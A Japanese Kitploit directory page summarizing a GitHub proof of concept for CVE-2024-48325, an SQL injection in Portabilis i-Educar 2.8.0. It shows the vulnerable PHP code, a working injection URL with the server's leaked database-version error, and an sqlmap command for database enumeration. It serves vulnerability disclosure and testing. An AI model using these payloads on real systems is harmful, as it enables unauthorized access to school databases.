Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2024-48325 — # Portabilis i-Educar 2.8.0 におけるSQLインジェクションの概念実証 Portabilis i-Educar 2.8.0のSQLインジェクションの概念実証(PoC)です。getDocumentsエンドポイントを介した未認証のデータベースアクセスを示し、SQLMapを用いた自動化された悪用を実演します。 | Kitploit
ツール/GitHubGitHub/osvaldotenorio/cve-2024-48325
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストデータベースセキュリティ
GitHubosvaldotenorio/cve-2024-48325

cve-2024-48325

# Portabilis i-Educar 2.8.0 におけるSQLインジェクションの概念実証 Portabilis i-Educar 2.8.0のSQLインジェクションの概念実証(PoC)です。getDocumentsエンドポイントを介した未認証のデータベースアクセスを示し、SQLMapを用いた自動化された悪用を実演します。

リポジトリを見る
171年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-48325

説明: 認証されたユーザーは、InstituicaoDocumentacaoController クラスの getDocuments 関数に存在する SQL インジェクションの脆弱性を悪用できます。/module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id の instituicao_id パラメータは適切にサニタイズされておらず、認証されたリモート攻撃者が悪意のある SQL コマンドを注入することを可能にします。

バージョン: Portabilis i-Educar 2.8.0 で発見されました。

概念実証

脆弱性の詳細

この問題は、InstituicaoDocumentacaoController クラスの getDocuments 関数に存在し、次のエンドポイントからトリガーされます:

class InstituicaoDocumentacaoController extends ApiCoreController
{
    protected function insertDocuments()
    {
        $var1 = $this->getRequest()->instituicao_id;
        $var2 = $this->getRequest()->titulo_documento;
        $var3 = $this->getRequest()->url_documento;
        $var4 = $this->getRequest()->ref_usuario_cad;
        $var5 = $this->getRequest()->ref_cod_escola;
        $sql = "INSERT INTO pmieducar.instituicao_documentacao (instituicao_id, titulo_documento, url_documento, ref_usuario_cad, ref_cod_escola) VALUES ($var1, '$var2', '$var3', $var4, $var5)";
        $this->fetchPreparedQuery($sql);
        $sql = "SELECT MAX(id) FROM pmieducar.instituicao_documentacao WHERE instituicao_id = $var1";
        $novoId = $this->fetchPreparedQuery($sql);
        return ['id' => $novoId[0][0]];
    }
    
    protected function getDocuments()
    {
        $var1 = $this->getRequest()->instituicao_id;
        $sql = "SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = $var1 ORDER BY id DESC";
        $instituicao = $this->fetchPreparedQuery($sql);
        $attrs = ['id', 'titulo_documento', 'url_documento', 'ref_usuario_cad', 'ref_cod_escola'];
        $instituicao = Portabilis_Array_Utils::filterSet($instituicao, $attrs);
        return ['documentos' => $instituicao];
    }
}

脆弱性が発生する仕組み

instituicao_id パラメータは、適切なサニタイズやパラメータ化が行われずに SQL クエリで直接使用されます。これにより、攻撃者は悪意のある HTTP リクエストを送信して SQL コマンドを注入し、データベースへの不正アクセスやデータの改ざんが可能になる可能性があります。

  • 脆弱性を引き起こすエンドポイントの例: /module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id=14
  • エクスプロイトの例: /module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id=14+AND+(CAST(VERSION()+AS+INTEGER))%3d1

サーバーの応答:

{
    "oper": "get",
    "resource": "getDocuments",
    "msgs": [
        {
            "msg": "Exception: Error preparing query (SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = 1 AND (CAST(VERSION() AS INTEGER))=1 ORDER BY id DESC) in the database: Exception: SQLSTATE[22P02]: Invalid text representation: 7 ERROR: invalid input syntax for type integer: \"PostgreSQL 16.4 on x86_64-pc-linux-musl, compiled by gcc (Alpine 13.2.1_git20240309) 13.2.1 20240309, 64-bit\" (Connection: pgsql, SQL: SELECT * FROM pmieducar.instituicao_documentacao WHERE instituicao_id = 1 AND (CAST(VERSION() AS INTEGER))=1 ORDER BY id DESC)",
            "type": "error"
        }
    ],
    "any_error_msg": true
}

自動化されたエクスプロイト

  • この脆弱性は、SQLMap などの自動化ツールによっても悪用され、データベースの列挙が可能になります: sqlmap -r ../instituicaoDocumentacao.r --dbms postgres --dbs -p instituicao_id --risk 3 --level 5

SQLMap

ツールをダウンロード